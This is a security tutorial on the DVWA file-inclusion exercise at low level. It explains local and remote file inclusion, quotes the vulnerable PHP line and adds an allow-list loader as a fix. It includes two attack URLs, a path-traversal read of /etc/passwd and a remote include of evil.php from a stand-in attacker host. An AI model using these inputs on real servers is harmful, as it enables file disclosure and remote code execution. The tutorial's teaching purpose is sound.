DVWA-FILE INCLUSION : LOW Level
Some web applications allow the user to specify input that is used directly in file streams, or allow the user to upload files to the server. At a later time the web application accesses the user-supplied input in the web application's context. By doing this, the web application allows the potential for malicious file execution.
Local Example: http://127.0.0.1/dvwa/fi/?page=../../../../../../etc/passwd
or
Remote Example: http://127.0.0.1/dvwa/fi/?page=http://www.evilsite.com/evil.php
<?php
$file = $_GET['page']; //The page we wish to display
?>
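For comparison with the snippet above, here is an allow-list version of the same page loader. This is an added example, not code from the original post or from DVWA; the page names, the `pages/` directory and the `resolve_page` helper are assumptions made for illustration.

```php
<?php
// Added example, not DVWA's own code. Page names and pages/ directory are assumed.

// Allow-list: maps the public ?page= value to a fixed file on disk.
const ALLOWED_PAGES = [
    'include' => 'include.php',
    'file1'   => 'file1.php',
    'file2'   => 'file2.php',
];

// Resolve a user-supplied page name to a safe absolute path, or null.
function resolve_page(string $requested, string $baseDir): ?string
{
    // Only exact allow-list keys are accepted, so values containing "../"
    // or a URL scheme never reach the filesystem layer.
    if (!array_key_exists($requested, ALLOWED_PAGES)) {
        return null;
    }
    $base = realpath($baseDir);
    $path = realpath($baseDir . DIRECTORY_SEPARATOR . ALLOWED_PAGES[$requested]);
    // Defence in depth: the file must exist and resolve inside the base
    // directory (this also rejects symlinks that point elsewhere).
    if ($base === false || $path === false
        || strncmp($path, $base . DIRECTORY_SEPARATOR, strlen($base) + 1) !== 0) {
        return null;
    }
    return $path;
}

// Pattern from the post, for comparison:
//   $file = $_GET['page'];
//   include $file;   // assumed next step: the value is used unchanged

$page = $_GET['page'] ?? 'include';
// ?page[]=x arrives as an array, so check the type before resolving.
$file = is_string($page) ? resolve_page($page, __DIR__ . '/pages') : null;

if ($file === null) {
    http_response_code(404);
    exit('Page not found');
}
include $file;
```

With this loader both example URLs above return a 404, because neither value is a key in the allow-list. Keeping `allow_url_include` set to `Off` in php.ini (the PHP default) additionally blocks the remote form.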